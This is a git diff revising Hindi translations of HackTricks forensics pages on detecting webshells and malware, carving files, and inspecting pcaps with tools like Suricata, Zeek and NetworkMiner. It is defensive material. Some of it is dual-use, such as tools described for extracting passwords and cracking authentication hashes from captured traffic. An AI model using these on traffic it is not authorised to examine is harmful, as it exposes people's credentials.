+[**DiE**](https://github.com/horsicq/Detect-It-Easy/) एक टूल है जो फ़ाइल को **encrypted** है या नहीं यह खोजने के लिए है और **packers** भी खोजेगा। ### NeoPI -[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI) एक Python स्क्रिप्ट है जो **सांख्यिकीय विधियों** का उपयोग करके **छिपे हुए** और **एन्क्रिप्टेड** सामग्री की खोज करने के लिए है। NeoPI का उद्देश्य **छिपी वेब शैल कोड** की **खोज** में सहायता करना है। +[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI) एक Python script है जो **statistical methods** का उपयोग करके **obfuscated** और **encrypted** content को text/script files में खोजने के लिए है। NeoPI का उद्देश्य **hidden web shell code** की **detection** में सहायता करना है। ### **php-malware-finder** -[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) अपनी सर्वोत्तम प्रयास करता है कि **छिपे हुए**/**अविश्वसनीय कोड** को खोजें जैसे कि फ़ाइलें जो **मैलवेयर**/वेबशैल में अक्सर उपयोग की जाने वाली **PHP** फ़ंक्शन्स का उपयोग कर रही हों। +[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) अपनी सर्वोत्तम प्रयास करता है कि **obfuscated**/**dodgy code** और फ़ाइलें खोजें जो **malwares**/webshells में अक्सर उपयोग की जाने वाली **PHP** functions का उपयोग करती हैं। ### Apple Binary Signatures -किसी **मैलवेयर नमूने** की जांच करते समय आपको हमेशा बाइनरी के **सिग्नेचर** की जांच करनी चाहिए क्योंकि उस **डेवलपर** को जिसने इसे साइन किया हो, पहले से ही **मैलवेयर** से **संबंधित** हो सकता है। +किसी **malware sample** की जांच करते समय आपको हमेशा बाइनरी के **signature** की जांच करनी चाहिए क्योंकि उस **developer** को जिसने इसे **sign** किया हो संबंधित हो सकता है **malware** के साथ। ```bash #Get signer codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier" @@ -149,16 +150,16 @@ codesign --verify --verbose /Applications/Safari.app #Check if the signature is valid spctl --assess --verbose /Applications/Safari.app ``` -## पहचान तकनीकें +## डिटेक्शन तकनीक ### फ़ाइल स्टैकिंग -अगर आपको पता है कि किसी वेब सर्वर के **फ़ाइलें** की एक फ़ोल्डर **कोई निश्चित तारीख** को **अपडेट किया गया था**। **जांचें** कि **वेब सर्वर की सभी फ़ाइलें कब बनाई और संशोधित** की गई थीं और यदि कोई तारीख **संदिग्ध** है, तो उस फ़ाइल की जांच करें। +अगर आपको पता है कि किसी वेब सर्वर के **फ़ाइलें** की किसी तारीख को **अंतिम बार अपडेट हुई थी**। **जांचें** कि **वेब सर्वर में सभी फ़ाइलें कब बनाई और संशोधित की गई थीं** और यदि कोई तारीख **संदिग्ध** है, तो उस फ़ाइल की जांच करें। ### बेसलाइन्स -अगर किसी फ़ोल्डर की फ़ाइलें **संशोधित नहीं होनी चाहिए**, तो आप फ़ोल्डर की **मौलिक फ़ाइलों** का **हैश** निकाल सकते हैं और उन्हें **वर्तमान** वालों के साथ **तुलना** कर सकते हैं। कुछ भी संशोधित होने पर **संदिग्ध** होगा। +अगर किसी फ़ोल्डर की फ़ाइलें **संशोधित नहीं होनी चाहिए**, तो आप फ़ोल्डर की **मौलिक फ़ाइलों** का **हैश** निकाल सकते हैं और उन्हें **वर्तमान** फ़ाइलों के साथ **तुलना** कर सकते हैं। कुछ भी संशोधित होने पर **संदिग्ध** होगा। ### सांख्यिकीय विश्लेषण -जब जानकारी लॉग में सहेजी जाती है तो आप **जांच सकते हैं कि वेब सर्वर की प्रत्येक फ़ाइल का कितनी बार एक्सेस किया गया था क्योंकि एक वेब शैल में एक** शामिल हो सकता है। +जब जानकारी लॉग में सहेजी जाती है तो आप **जांच सकते हैं कि वेब सर्वर की प्रत्येक फ़ाइल का कितनी बार एक्सेस किया गया था क्योंकि एक वेब शैल में सबसे अधिक हो सकता है**। diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md index 179962994..3ee6c1329 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md @@ -1,29 +1,28 @@ +{% hint style="success" %} +एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +जीसीपी हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सदस्यता योजनाएं देखें**](https://github.com/sponsors/carlospolop)! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github repos में PRs सबमिट करके। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
+{% endhint %} -# खुदाई उपकरण +# कार्विंग टूल्स ## Autopsy -जांच में सबसे आम उपकरण जो छवियों से फ़ाइलें निकालने के लिए उपयोग किया जाता है [**Autopsy**](https://www.autopsy.com/download/) है। इसे डाउनलोड करें, स्थापित करें और फ़ाइल को इंजेस्ट करने के लिए इसे बनाएं "छिपी" फ़ाइलें खोजने के लिए। ध्यान दें कि Autopsy को डिस्क छवियों और अन्य प्रकार की छवियों का समर्थन करने के लिए बनाया गया है, लेकिन साधारण फ़ाइलों का नहीं। +फोरेंसिक्स में सबसे आम उपयोग किया जाने वाला टूल [**Autopsy**](https://www.autopsy.com/download/) है। इसे डाउनलोड करें, इंस्टॉल करें और फ़ाइल को इंजेस्ट करने के लिए इसका उपयोग करें ताकि "छिपी" फ़ाइलें मिल सकें। ध्यान दें कि Autopsy को डिस्क इमेज और अन्य प्रकार की इमेज का समर्थन करने के लिए बनाया गया है, लेकिन साधारण फ़ाइलों का समर्थन नहीं किया गया है। ## Binwalk -**Binwalk** एक उपकरण है जो छवियों और ऑडियो फ़ाइलों जैसी बाइनरी फ़ाइलों को खोजने के लिए है जिसमें एम्बेडेड फ़ाइलें और डेटा होता है। -इसे `apt` के साथ स्थापित किया जा सकता है हालांकि [स्रोत](https://github.com/ReFirmLabs/binwalk) github पर मिल सकता है। -**उपयोगी कमांड**: +**Binwalk** एक टूल है जो इमेज और ऑडियो फ़ाइलों जैसे बाइनरी फ़ाइलों में छिपी फ़ाइलें और डेटा की खोज के लिए उपयोग किया जाता है। इसे `apt` के साथ इंस्टॉल किया जा सकता है हालांकि [स्रोत](https://github.com/ReFirmLabs/binwalk) github पर उपलब्ध है। **उपयोगी कमांड**: ```bash sudo apt install binwalk #Insllation binwalk file #Displays the embedded data in the given file @@ -32,15 +31,15 @@ binwalk --dd ".*" file #Displays and extracts all files from the given file ``` ## Foremost -छिपे फ़ाइलें खोजने के लिए एक और सामान्य उपकरण है **foremost**। आप foremost का विन्यास फ़ाइल `/etc/foremost.conf` में पा सकते हैं। यदि आप कुछ विशिष्ट फ़ाइलें खोजना चाहते हैं तो उन्हें uncomment करें। यदि आप कुछ uncomment नहीं करते हैं तो foremost अपने डिफ़ॉल्ट विन्यासित फ़ाइल प्रकारों के लिए खोज करेगा। +छिपी हुई फ़ाइलें खोजने के लिए एक और सामान्य उपकरण है **foremost**। आप foremost का विन्यास फ़ाइल `/etc/foremost.conf` में पा सकते हैं। यदि आप कुछ विशिष्ट फ़ाइलें खोजना चाहते हैं तो उन्हें uncomment करें। यदि आप कुछ uncomment नहीं करते हैं तो foremost अपने डिफ़ॉल्ट विन्यस्त फ़ाइल प्रकारों के लिए खोज करेगा। ```bash sudo apt-get install foremost foremost -v -i file.img -o output #Discovered files will appear inside the folder "output" ``` -## **Scalpel** +## **स्कैल्पल** -**Scalpel** एक और उपकरण है जिसका उपयोग **एक फ़ाइल में एम्बेड किए गए फ़ाइलें खोजने और निकालने** के लिए किया जा सकता है। इस मामले में, आपको उसे निकालने के लिए फ़ाइल प्रकारों को कॉन्फ़िगरेशन फ़ाइल \(_/etc/scalpel/scalpel.conf_\) से uncomment करने की आवश्यकता होगी। +**स्कैल्पल** एक और उपकरण है जिसका उपयोग **एक फ़ाइल में एम्बेड किए गए फ़ाइलें खोजने और निकालने** के लिए किया जा सकता है। इस मामले में, आपको उसे निकालना चाहिए जिसे आप विन्यास फ़ाइल \(_/etc/scalpel/scalpel.conf_\) से अनटिक करना चाहेंगे। ```bash sudo apt-get install scalpel scalpel file.img -o output @@ -53,13 +52,13 @@ scalpel file.img -o output ```text bulk_extractor memory.img -o out_folder ``` -Navigate through **सभी जानकारी** जो उपकरण ने इकट्ठा की है \(पासवर्ड?\), **डाटा पैकेट** का **विश्लेषण** करें \(पढ़ें [**Pcaps विश्लेषण**](../pcap-inspection/)\), **अजीब डोमेन** की खोज करें \(मैलवेयर से संबंधित या **अस्तित्व में न होने वाले** डोमेन\). +Navigate through **सभी जानकारी** जो उपकरण ने इकट्ठा की है \(पासवर्ड?\), **विश्लेषित** करें **पैकेट्स** \(पढ़ें [**Pcaps विश्लेषण**](../pcap-inspection/)\), **अजीब डोमेन** खोजें \(मैलवेयर से संबंधित या **अस्तित्वहीन**\). ## PhotoRec आप इसे [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk_Download) में पा सकते हैं। -यह GUI और CLI संस्करण के साथ आता है। आप फाइल-प्रकार चुन सकते हैं जिनकी खोज के लिए PhotoRec को। +यह GUI और CLI संस्करण के साथ आता है। आप चुन सकते हैं **फ़ाइल-प्रकार** जिनकी खोज के लिए PhotoRec को खोजना है। ![](../../../.gitbook/assets/image%20%28524%29.png) @@ -67,10 +66,11 @@ Navigate through **सभी जानकारी** जो उपकरण न ## FindAES -अपने की स्थिति खोजने के लिए AES कुंजियों की खोज करता है उनकी कुंजी अनुसूचियों की खोज करके। 128, 192, और 256 बिट कुंजियों को खोजने में सक्षम है, जैसे कि TrueCrypt और BitLocker द्वारा उपयोग की गई कुंजियाँ। +अपने कुंजी अनुसूचियों की खोज करके AES कुंजियों की खोज करता है। 128, 192, और 256 बिट कुंजियों को खोजने में सक्षम है, जैसे जो TrueCrypt और BitLocker द्वारा उपयोग की जाती हैं। -यहाँ से डाउनलोड करें [here](https://sourceforge.net/projects/findaes/). +यहाँ [डाउनलोड करें](https://sourceforge.net/projects/findaes/). # पूरक उपकरण -आप [**viu** ](https://github.com/atanunq/viu)का उपयोग कर सकते हैं छवियों को देखने के लिए टर्मिनल से। आप लिनक्स कमांड लाइन उपकरण **pdftotext** का उपयोग कर सकते हैं एक पीडीएफ को पाठ में बदलने और पढ़ने के लिए। +आप [**viu** ](https://github.com/atanunq/viu)का उपयोग कर सकते हैं ताकि आप छवियों को टर्मिनल से देख सकें। +आप लिनक्स कमांड लाइन उपकरण **pdftotext** का उपयोग करके एक पीडीएफ को पाठ में रूपांतरित करने और पढ़ने के लिए कर सकते हैं। diff --git a/forensics/basic-forensic-methodology/pcap-inspection/README.md b/forensics/basic-forensic-methodology/pcap-inspection/README.md index ec63445e6..f50d7b17c 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/README.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/README.md @@ -1,33 +1,34 @@ # Pcap Inspection +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन **The PEASS Family** की खोज करें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **हमें** **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें** द्वारा **PRs सबमिट** करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) **और हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में PR जमा करके।
+{% endhint %}
-[**RootedCON**](https://www.rootedcon.com/) **स्पेन** में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और **यूरोप** में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उबाऊ मिलन स्थल है। +[**RootedCON**](https://www.rootedcon.com/) **स्पेन** में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उबाऊ मिलन स्थल है। {% embed url="https://www.rootedcon.com/" %} {% hint style="info" %} -**PCAP** बनाम **PCAPNG** के बारे में एक नोट: PCAP फ़ाइल प्रारूप के दो संस्करण हैं; **PCAPNG नया है और सभी उपकरणों द्वारा समर्थित नहीं है**। कुछ अन्य उपकरणों में इसके साथ काम करने के लिए आपको एक फ़ाइल को Wireshark या किसी अन्य संगत उपकरण का उपयोग करके PCAP से PCAPNG में परिवर्तित करने की आवश्यकता हो सकती है। +**PCAP** vs **PCAPNG** के बारे में एक नोट: PCAP फ़ाइल प्रारूप के दो संस्करण हैं; **PCAPNG नया है और सभी उपकरणों द्वारा समर्थित नहीं है**। कुछ अन्य उपकरणों में इसके साथ काम करने के लिए आपको एक फ़ाइल को PCAP से PCAPNG में रूपांतरित करने की आवश्यकता हो सकती है, Wireshark या किसी अन्य संगत उपकरण का उपयोग करके। {% endhint %} ## Pcap के लिए ऑनलाइन उपकरण -* यदि आपके pcap का हेडर **टूटा हुआ** है तो आपको इसे ठीक करने के लिए यह आजमाना चाहिए: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) -* [**PacketTotal**](https://packettotal.com) में pcap में **जानकारी** और **मैलवेयर** खोजें +* यदि आपके pcap का हेडर **टूटा** हुआ है तो आपको इसे ठीक करने की कोशिश करनी चाहिए: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) +* [**PacketTotal**](https://packettotal.com) में pcap में **जानकारी** निकालें और **मैलवेयर** खोजें * [**www.virustotal.com**](https://www.virustotal.com) और [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) का उपयोग करके **दुष्ट गतिविधि** खोजें ## जानकारी निकालें @@ -37,7 +38,7 @@ HackTricks का समर्थन करने के अन्य तरी ### Wireshark {% hint style="info" %} -**यदि आप एक PCAP का विश्लेषण करने जा रहे हैं तो आपको मूल रूप से Wireshark का उपयोग कैसे करना है यह जानना चाहिए** +**यदि आप PCAP का विश्लेषण करने जा रहे हैं तो आपको बुनियादी रूप से Wireshark का उपयोग कैसे करना है, इसे जानना चाहिए** {% endhint %} आप Wireshark में कुछ ट्रिक्स यहाँ पा सकते हैं: @@ -62,27 +63,27 @@ sudo apt-get install xplico /etc/init.d/apache2 restart /etc/init.d/xplico start ``` -पहुँच _**127.0.0.1:9876**_ के साथ पहुँचने के लिए पहुँचकर्ता _**xplico:xplico**_ +_**127.0.0.1:9876**_ क्रेडेंशियल के साथ पहुंचें _**xplico:xplico**_ -फिर **नया मामला** बनाएं, मामले के अंदर **नई सत्र** बनाएं और **pcap** फ़ाइल **अपलोड** करें। +फिर **नया मामला** बनाएं, मामले के अंदर **नई सत्र** बनाएं और **pcap फ़ाइल अपलोड** करें। ### NetworkMiner -Xplico की तरह यह एक उपकरण है जो **pcaps से वस्तुओं का विश्लेषण और निकालना** करने के लिए है। इसका एक मुफ्त संस्करण है जिसे आप [**यहाँ**](https://www.netresec.com/?page=NetworkMiner) से **डाउनलोड** कर सकते हैं। यह **Windows** के साथ काम करता है।\ -यह उपकरण भी **पैकेट्स से अन्य जानकारी प्राप्त** करने के लिए उपयोगी है ताकि एक **तेज़ तरीके से** क्या हो रहा था उसे पता चल सके। +Xplico की तरह यह एक उपकरण है **pcaps से वस्तुओं का विश्लेषण और निकालने** के लिए। इसका एक मुफ्त संस्करण है जिसे आप [**यहाँ**](https://www.netresec.com/?page=NetworkMiner) से **डाउनलोड** कर सकते हैं। यह **Windows** के साथ काम करता है।\ +यह उपकरण भी **पैकेट्स से अन्य जानकारी** प्राप्त करने के लिए उपयोगी है ताकि आप एक **तेज़ तरीके से** क्या हो रहा था उसे जान सकें। ### NetWitness Investigator आप [**यहाँ से NetWitness Investigator डाउनलोड कर सकते हैं**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(यह Windows में काम करता है)**।\ -यह एक और उपयोगी उपकरण है जो **पैकेट्स का विश्लेषण** करता है और जानकारी को एक उपयोगी तरीके से **व्यवस्थित करता है** ताकि **अंदर क्या हो रहा है** उसे पता चल सके। +यह एक और उपयोगी उपकरण है जो **पैकेट्स का विश्लेषण** करता है और जानकारी को एक उपयोगी तरीके से **व्यवस्थित करता है** ताकि आप यह जान सकें कि अंदर क्या हो रहा है। ### [BruteShark](https://github.com/odedshimon/BruteShark) -* उपयोगकर्ता नाम और पासवर्ड (HTTP, FTP, Telnet, IMAP, SMTP...) को निकालना और एन्कोड करना +* उपयोगकर्ता नाम और पासवर्ड को निकालना और एन्कोड करना (HTTP, FTP, Telnet, IMAP, SMTP...) * प्रमाणीकरण हैश निकालना और Hashcat का उपयोग करके उन्हें क्रैक करना (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...) -* एक दृश्यात्मक नेटवर्क आरेखित करना (नेटवर्क नोड्स और उपयोगकर्ता) -* DNS पूछताछ निकालना -* सभी TCP और UDP सत्रों का पुनर्निर्माण करना +* एक विजुअल नेटवर्क आरेखित करना (नेटवर्क नोड्स और उपयोगकर्ता) +* DNS क्वेरी निकालना +* सभी TCP और UDP सत्र पुनर्निर्माण करना * फ़ाइल कार्विंग ### Capinfos @@ -91,7 +92,7 @@ capinfos capture.pcap ``` ### Ngrep -यदि आप pcap के अंदर कुछ ढूंढ़ रहे हैं तो आप **ngrep** का उपयोग कर सकते हैं। यहाँ मुख्य फ़िल्टर्स का उपयोग करके एक उदाहरण है: +यदि आप pcap के अंदर कुछ **खोज** रहे हैं तो आप **ngrep** का उपयोग कर सकते हैं। यहाँ मुख्य फ़िल्टर्स का उपयोग करके एक उदाहरण है: ```bash ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168" ``` @@ -103,7 +104,7 @@ ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192. [file-data-carving-recovery-tools.md](../partitions-file-systems-carving/file-data-carving-recovery-tools.md) {% endcontent-ref %} -### क्रेडेंशियल कैप्चर +### क्रेडेंशियल कैप्चरिंग आप [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) जैसे उपकरणों का उपयोग कर सकते हैं ताकि आप pcap या लाइव इंटरफेस से क्रेडेंशियल को पार्स कर सकें। @@ -113,18 +114,18 @@ ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192. {% embed url="https://www.rootedcon.com/" %} -## जांच करें Exploits/Malware +## जांच एक्सप्लॉइट्स/मैलवेयर ### Suricata -**स्थापित और सेटअप** +**स्थापित करें और सेटअप** ``` apt-get install suricata apt-get install oinkmaster echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz" >> /etc/oinkmaster.conf oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules ``` -**पीकैप जांचें** +**पीकैप जाँचें** ``` suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log ``` @@ -132,8 +133,8 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log [**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) एक टूल है जो -* एक PCAP फ़ाइल पढ़ता है और Http स्ट्रीम्स निकालता है। -* किसी भी संपीडित स्ट्रीम को gzip डिफ़्लेट करता है +* एक PCAP फ़ाइल पढ़ता है और Http स्ट्रीम निकालता है। +* किसी भी संपीड़ित स्ट्रीम को gzip डिफ़्लेट करता है * हर फ़ाइल को यारा के साथ स्कैन करता है * रिपोर्ट.txt लिखता है * वैकल्पिक रूप से मिलने वाली फ़ाइलों को एक डिर में सहेजता है @@ -148,9 +149,9 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log ## Zeek -> [Zeek](https://docs.zeek.org/en/master/about.html) एक पैसिव, ओपन-सोर्स नेटवर्क ट्रैफ़िक विश्लेषक है। कई ऑपरेटर्स संदेहात्मक या दुराचार गतिविधि की जांच का समर्थन करने के लिए Zeek का उपयोग नेटवर्क सुरक्षा मॉनिटर (NSM) के रूप में करते हैं। Zeek इसके अलावा सुरक्षा डोमेन के पार एक व्यापक ट्रैफ़िक विश्लेषण कार्यों का समर्थन भी करता है, जिसमें प्रदर्शन मापन और समस्या सुलझाने जैसे कार्य शामिल हैं। +> [Zeek](https://docs.zeek.org/en/master/about.html) एक पैसिव, ओपन-सोर्स नेटवर्क ट्रैफ़िक विश्लेषक है। कई ऑपरेटर संदेहपूर्ण या दुष्ट गतिविधि की जांच का समर्थन करने के लिए Zeek का उपयोग नेटवर्क सुरक्षा मॉनिटर (NSM) के रूप में करते हैं। Zeek नेटवर्क सुरक्षा डोमेन के अलावा एक व्यापक ट्रैफ़िक विश्लेषण कार्यों का समर्थन भी करता है, जिसमें प्रदर्शन मापन और ट्रबलशूटिंग शामिल है। -मूल रूप से, `zeek` द्वारा बनाए गए लॉग **पीकैप्स** नहीं हैं। इसलिए आपको लॉग का विश्लेषण करने के लिए **अन्य उपकरण** का उपयोग करना होगा जहां **जानकारी** पीकैप्स के बारे में होती है। +मूल रूप से, `zeek` द्वारा बनाए गए लॉग **पीकैप्स** नहीं हैं। इसलिए आपको लॉग विश्लेषित करने के लिए **अन्य उपकरण** का उपयोग करना होगा जहां **पीकैप्स** के बारे में **जानकारी** हो। ### कनेक्शन जानकारी ```bash @@ -237,20 +238,21 @@ rita show-exploded-dns -H --limit 10 zeek_logs
-[**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उबाऊ मिलन स्थल है। +[**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उफान मिलने का समारोह है। {% embed url="https://www.rootedcon.com/" %} +{% hint style="success" %} +AWS हैकिंग सीखें और अभ्यास करें:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP हैकिंग सीखें और अभ्यास करें: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **जुड़ें** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) से या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 पर हमें **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PR जमा करके।
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md b/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md index f1404025c..9524a0789 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md @@ -1,27 +1,43 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** (https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके। +* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 